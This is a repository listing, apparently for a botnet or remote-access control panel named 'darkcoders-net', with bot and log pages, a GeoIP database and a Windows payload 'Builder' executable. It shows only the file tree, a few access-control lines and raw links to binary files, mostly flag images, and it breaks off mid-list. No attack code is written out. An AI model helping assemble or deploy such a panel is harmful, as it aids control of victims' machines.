├── Panel ├── .htaccess ├── securimage │ ├── database │ │ ├── index.html │ │ ├── .htaccess │ │ └── securimage.sq3 │ ├── audio │ │ ├── .htaccess │ │ ├── en │ │ │ ├── 0.wav │ │ │ ├── 1.wav │ │ │ ├── 10.wav │ │ │ ├── 11.wav │ │ │ ├── 12.wav │ │ │ ├── 13.wav │ │ │ ├── 14.wav │ │ │ ├── 15.wav │ │ │ ├── 16.wav │ │ │ ├── 17.wav │ │ │ ├── 18.wav │ │ │ ├── 19.wav │ │ │ ├── 2.wav │ │ │ ├── 20.wav │ │ │ ├── 3.wav │ │ │ ├── 4.wav │ │ │ ├── 5.wav │ │ │ ├── 6.wav │ │ │ ├── 7.wav │ │ │ ├── 8.wav │ │ │ ├── 9.wav │ │ │ ├── A.wav │ │ │ ├── B.wav │ │ │ ├── C.wav │ │ │ ├── D.wav │ │ │ ├── E.wav │ │ │ ├── F.wav │ │ │ ├── G.wav │ │ │ ├── H.wav │ │ │ ├── I.wav │ │ │ ├── J.wav │ │ │ ├── K.wav │ │ │ ├── L.wav │ │ │ ├── M.wav │ │ │ ├── N.wav │ │ │ ├── O.wav │ │ │ ├── P.wav │ │ │ ├── Q.wav │ │ │ ├── R.wav │ │ │ ├── S.wav │ │ │ ├── T.wav │ │ │ ├── U.wav │ │ │ ├── V.wav │ │ │ ├── W.wav │ │ │ ├── X.wav │ │ │ ├── Y.wav │ │ │ ├── Z.wav │ │ │ ├── MINUS.wav │ │ │ ├── PLUS.wav │ │ │ ├── TIMES.wav │ │ │ └── error.wav │ │ └── noise │ │ │ ├── check-point-1.wav │ │ │ ├── kids-playing-1.wav │ │ │ ├── crowd-talking-1.wav │ │ │ ├── crowd-talking-6.wav │ │ │ └── crowd-talking-7.wav │ ├── AHGBold.ttf │ ├── backgrounds │ │ ├── bg3.jpg │ │ ├── bg4.jpg │ │ ├── bg5.jpg │ │ └── bg6.png │ └── securimage_show.php ├── robots.txt ├── assets │ ├── images │ │ ├── logo.jpg │ │ └── flags │ │ │ ├── ad.png │ │ │ ├── ae.png │ │ │ ├── af.png │ │ │ ├── ag.png │ │ │ ├── ai.png │ │ │ ├── al.png │ │ │ ├── am.png │ │ │ ├── an.png │ │ │ ├── ar.png │ │ │ ├── as.png │ │ │ ├── at.png │ │ │ ├── au.png │ │ │ ├── aw.png │ │ │ ├── ax.png │ │ │ ├── az.png │ │ │ ├── ba.png │ │ │ ├── bb.png │ │ │ ├── bd.png │ │ │ ├── be.png │ │ │ ├── bf.png │ │ │ ├── bg.png │ │ │ ├── bh.png │ │ │ ├── bi.png │ │ │ ├── bj.png │ │ │ ├── bm.png │ │ │ ├── bn.png │ │ │ ├── bo.png │ │ │ ├── br.png │ │ │ ├── bs.png │ │ │ ├── bt.png │ │ │ ├── bv.png │ │ │ ├── bw.png │ │ │ ├── by.png │ │ │ ├── bz.png │ │ │ ├── ca.png │ │ │ ├── cc.png │ │ │ ├── cd.png │ │ │ ├── cf.png │ │ │ ├── cg.png │ │ │ ├── ch.png │ │ │ ├── ci.png │ │ │ ├── ck.png │ │ │ ├── cl.png │ │ │ ├── cm.png │ │ │ ├── cn.png │ │ │ ├── co.png │ │ │ ├── cr.png │ │ │ ├── cs.png │ │ │ ├── cu.png │ │ │ ├── cv.png │ │ │ ├── cx.png │ │ │ ├── cy.png │ │ │ ├── cz.png │ │ │ ├── de.png │ │ │ ├── dj.png │ │ │ ├── dk.png │ │ │ ├── dm.png │ │ │ ├── do.png │ │ │ ├── dz.png │ │ │ ├── ec.png │ │ │ ├── ee.png │ │ │ ├── eg.png │ │ │ ├── eh.png │ │ │ ├── er.png │ │ │ ├── es.png │ │ │ ├── et.png │ │ │ ├── eu.png │ │ │ ├── fi.png │ │ │ ├── fj.png │ │ │ ├── fk.png │ │ │ ├── fm.png │ │ │ ├── fo.png │ │ │ ├── fr.png │ │ │ ├── ga.png │ │ │ ├── gb.png │ │ │ ├── gd.png │ │ │ ├── ge.png │ │ │ ├── gf.png │ │ │ ├── gg.png │ │ │ ├── gh.png │ │ │ ├── gi.png │ │ │ ├── gl.png │ │ │ ├── gm.png │ │ │ ├── gn.png │ │ │ ├── gp.png │ │ │ ├── gq.png │ │ │ ├── gr.png │ │ │ ├── gs.png │ │ │ ├── gt.png │ │ │ ├── gu.png │ │ │ ├── gw.png │ │ │ ├── gy.png │ │ │ ├── hk.png │ │ │ ├── hm.png │ │ │ ├── hn.png │ │ │ ├── hr.png │ │ │ ├── ht.png │ │ │ ├── hu.png │ │ │ ├── id.png │ │ │ ├── ie.png │ │ │ ├── il.png │ │ │ ├── im.png │ │ │ ├── in.png │ │ │ ├── io.png │ │ │ ├── iq.png │ │ │ ├── ir.png │ │ │ ├── is.png │ │ │ ├── it.png │ │ │ ├── je.png │ │ │ ├── jm.png │ │ │ ├── jo.png │ │ │ ├── jp.png │ │ │ ├── ke.png │ │ │ ├── kg.png │ │ │ ├── kh.png │ │ │ ├── ki.png │ │ │ ├── km.png │ │ │ ├── kn.png │ │ │ ├── kp.png │ │ │ ├── kr.png │ │ │ ├── kw.png │ │ │ ├── ky.png │ │ │ ├── kz.png │ │ │ ├── la.png │ │ │ ├── lb.png │ │ │ ├── lc.png │ │ │ ├── li.png │ │ │ ├── lk.png │ │ │ ├── lr.png │ │ │ ├── ls.png │ │ │ ├── lt.png │ │ │ ├── lu.png │ │ │ ├── lv.png │ │ │ ├── ly.png │ │ │ ├── ma.png │ │ │ ├── mc.png │ │ │ ├── md.png │ │ │ ├── me.png │ │ │ ├── mg.png │ │ │ ├── mh.png │ │ │ ├── mk.png │ │ │ ├── ml.png │ │ │ ├── mm.png │ │ │ ├── mn.png │ │ │ ├── mo.png │ │ │ ├── mp.png │ │ │ ├── mq.png │ │ │ ├── mr.png │ │ │ ├── ms.png │ │ │ ├── mt.png │ │ │ ├── mu.png │ │ │ ├── mv.png │ │ │ ├── mw.png │ │ │ ├── mx.png │ │ │ ├── my.png │ │ │ ├── mz.png │ │ │ ├── na.png │ │ │ ├── nc.png │ │ │ ├── ne.png │ │ │ ├── nf.png │ │ │ ├── ng.png │ │ │ ├── ni.png │ │ │ ├── nl.png │ │ │ ├── no.png │ │ │ ├── np.png │ │ │ ├── nr.png │ │ │ ├── nu.png │ │ │ ├── nz.png │ │ │ ├── om.png │ │ │ ├── pa.png │ │ │ ├── pe.png │ │ │ ├── pf.png │ │ │ ├── pg.png │ │ │ ├── ph.png │ │ │ ├── pk.png │ │ │ ├── pl.png │ │ │ ├── pm.png │ │ │ ├── pn.png │ │ │ ├── pr.png │ │ │ ├── ps.png │ │ │ ├── pt.png │ │ │ ├── pw.png │ │ │ ├── py.png │ │ │ ├── qa.png │ │ │ ├── re.png │ │ │ ├── ro.png │ │ │ ├── rs.png │ │ │ ├── ru.png │ │ │ ├── rw.png │ │ │ ├── sa.png │ │ │ ├── sb.png │ │ │ ├── sc.png │ │ │ ├── sd.png │ │ │ ├── se.png │ │ │ ├── sg.png │ │ │ ├── sh.png │ │ │ ├── si.png │ │ │ ├── sj.png │ │ │ ├── sk.png │ │ │ ├── sl.png │ │ │ ├── sm.png │ │ │ ├── sn.png │ │ │ ├── so.png │ │ │ ├── sr.png │ │ │ ├── st.png │ │ │ ├── sv.png │ │ │ ├── sy.png │ │ │ ├── sz.png │ │ │ ├── tc.png │ │ │ ├── td.png │ │ │ ├── tf.png │ │ │ ├── tg.png │ │ │ ├── th.png │ │ │ ├── tj.png │ │ │ ├── tk.png │ │ │ ├── tl.png │ │ │ ├── tm.png │ │ │ ├── tn.png │ │ │ ├── to.png │ │ │ ├── tr.png │ │ │ ├── tt.png │ │ │ ├── tv.png │ │ │ ├── tw.png │ │ │ ├── tz.png │ │ │ ├── ua.png │ │ │ ├── ug.png │ │ │ ├── um.png │ │ │ ├── us.png │ │ │ ├── uy.png │ │ │ ├── uz.png │ │ │ ├── va.png │ │ │ ├── vc.png │ │ │ ├── ve.png │ │ │ ├── vg.png │ │ │ ├── vi.png │ │ │ ├── vn.png │ │ │ ├── vu.png │ │ │ ├── wf.png │ │ │ ├── ws.png │ │ │ ├── ye.png │ │ │ ├── yt.png │ │ │ ├── za.png │ │ │ ├── zm.png │ │ │ └── zw.png │ ├── font │ │ ├── roboto │ │ │ ├── Roboto-Bold.ttf │ │ │ ├── Roboto-Thin.ttf │ │ │ ├── Roboto-Bold.woff │ │ │ ├── Roboto-Bold.woff2 │ │ │ ├── Roboto-Light.ttf │ │ │ ├── Roboto-Light.woff │ │ │ ├── Roboto-Medium.ttf │ │ │ ├── Roboto-Thin.woff │ │ │ ├── Roboto-Thin.woff2 │ │ │ ├── Roboto-Light.woff2 │ │ │ ├── Roboto-Medium.woff │ │ │ ├── Roboto-Medium.woff2 │ │ │ ├── Roboto-Regular.ttf │ │ │ ├── Roboto-Regular.woff │ │ │ └── Roboto-Regular.woff2 │ │ └── material-design-icons │ │ │ ├── Material-Design-Icons.ttf │ │ │ ├── Material-Design-Icons.woff │ │ │ ├── Material-Design-Icons.woff2 │ │ │ └── Material-Design-Iconsd41d.eot │ ├── css │ │ ├── assistance.css │ │ ├── styles.css │ │ ├── dataTables.bootstrap.css │ │ ├── preloader-stage.css │ │ └── login.css │ └── js │ │ ├── initialize.js │ │ └── dataTables.bootstrap.js ├── includes │ ├── geo │ │ └── GeoIP.dat │ ├── 404.php │ ├── stats.php │ ├── footer.php │ ├── config.php │ └── header.php ├── pages │ ├── logout.php │ ├── logs.php │ ├── bots.php │ ├── help.php │ ├── details.php │ ├── account.php │ ├── edituser.php │ ├── settings.php │ ├── main.php │ └── users.php ├── index.php ├── page.php ├── database │ └── darkcoders_net.sql.zip └── login │ └── index.php ├── Builder ├── darkcoders Builder.exe └── README.md ├── README.md └── SETUP GUIDE.md /Panel/.htaccess: -------------------------------------------------------------------------------- 1 | Options -Indexes 2 | 3 | -------------------------------------------------------------------------------- /Panel/securimage/database/index.html: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Panel/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: / -------------------------------------------------------------------------------- /Panel/securimage/audio/.htaccess: -------------------------------------------------------------------------------- 1 | deny from all 2 | -------------------------------------------------------------------------------- /Panel/securimage/database/.htaccess: -------------------------------------------------------------------------------- 1 | deny from all 2 | -------------------------------------------------------------------------------- /Builder/darkcoders Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Builder/darkcoders Builder.exe -------------------------------------------------------------------------------- /Panel/assets/images/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/logo.jpg -------------------------------------------------------------------------------- /Panel/includes/geo/GeoIP.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/includes/geo/GeoIP.dat -------------------------------------------------------------------------------- /Panel/securimage/AHGBold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/securimage/AHGBold.ttf -------------------------------------------------------------------------------- /Panel/assets/images/flags/ad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ad.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ae.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ae.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/af.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/af.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ag.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ai.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ai.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/al.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/al.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/am.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/am.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/an.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/an.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ar.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/as.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/as.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/at.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/at.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/au.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/au.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/aw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/aw.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ax.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ax.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/az.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/az.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ba.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ba.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bb.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bd.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/be.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/be.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bf.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bg.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bh.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bi.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bj.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bm.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bn.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bo.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/br.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/br.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bs.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bt.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bv.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bw.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/by.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/by.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/bz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/bz.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ca.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ca.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cc.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cd.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cf.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cg.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ch.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ci.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ci.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ck.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ck.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cl.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cm.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cn.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/co.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/co.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cr.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cs.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cu.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cv.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cx.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cy.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/cz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/cz.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/de.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/de.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/dj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/dj.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/dk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/dk.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/dm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/dm.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/do.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/do.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/dz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/dz.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ec.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ee.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ee.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/eg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/eg.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/eh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/eh.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/er.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/er.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/es.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/es.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/et.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/et.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/eu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/eu.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/fi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/fi.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/fj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/fj.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/fk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/fk.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/fm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/fm.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/fo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/fo.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/fr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/fr.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ga.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ga.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gb.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gd.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/ge.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gf.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gg.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gh.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gi.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gl.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gm.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gn.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gp.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gq.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gq.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gr.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gs.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gt.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gu.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gw.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/gy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/gy.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/hk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/hk.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/hm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/hm.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/hn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/hn.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/hr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hashXploiter/darkcoders-net/HEAD/Panel/assets/images/flags/hr.png -------------------------------------------------------------------------------- /Panel/assets/images/flags/ht.png: 